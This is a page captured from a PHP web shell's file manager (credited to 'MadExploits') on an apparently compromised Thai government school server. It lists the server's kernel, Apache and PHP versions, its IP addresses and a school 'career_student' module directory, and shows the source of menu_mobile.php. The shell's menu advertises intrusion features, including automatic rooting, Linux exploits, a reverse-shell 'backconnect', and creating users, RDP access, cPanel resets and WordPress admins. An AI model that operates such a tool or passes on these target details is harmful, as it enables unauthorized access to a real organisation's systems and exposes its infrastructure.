Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
career_student /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
install
[ DIR ]
drwxr-xr-x
manual
[ DIR ]
drwxr-xr-x
picture
[ DIR ]
drwxr-xr-x
default.php
485
B
-rwxr-xr-x
index.php
745
B
-rwxr-xr-x
menu.php
3.91
KB
-rwxr-xr-x
menu_mobile.php
963
B
-rwxr-xr-x
permission.php
8.74
KB
-rwxr-xr-x
permission_sch.php
9.93
KB
-rwxr-xr-x
permission_sch_khet.php
14.62
KB
-rwxr-xr-x
pic_show.php
1.73
KB
-rwxr-xr-x
pic_show2.php
655
B
-rwxr-xr-x
return_permission_sch_khet.php
1.2
KB
-rwxr-xr-x
student_khet_career.php
91.08
KB
-rwxr-xr-x
student_sch_career.php
106.32
KB
-rwxr-xr-x
student_sch_career_report1.php
40.91
KB
-rwxr-xr-x
student_sch_career_report1_mob...
19.73
KB
-rwxr-xr-x
student_sch_career_report2.php
43.59
KB
-rwxr-xr-x
student_sch_career_report3.php
9.83
KB
-rwxr-xr-x
student_sch_career_report3_mob...
4.01
KB
-rwxr-xr-x
time_inc.php
4.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : menu_mobile.php
<?php /** ensure this file is being included by a parent file */ defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' ); if($_SESSION['login_status']<5){ $sql_permission = "select * from career_student_permission where person_id='$_SESSION[login_user_id]'"; } else{ $sql_permission = "select * from career_student_permission where person_id='$_SESSION[login_user_id]' and school_code='$_SESSION[user_school]'"; } $dbquery_permission = mysqli_query($connect,$sql_permission); $result_permission = mysqli_fetch_array($dbquery_permission); if(!isset($_SESSION['admin_career_student'])){ $_SESSION['admin_career_student']=""; } echo "<table width='100%' border='0' cellspacing='0' cellpadding='0'>"; echo "<tr bgcolor='#FFCC00'><td>"; echo "<ul id='nav' class='dropdown dropdown-horizontal'>"; echo "<li><a href='./'>รายการหลัก</a></li>"; echo "</ul>"; echo "</td></tr>"; echo "</table>"; ?>
Close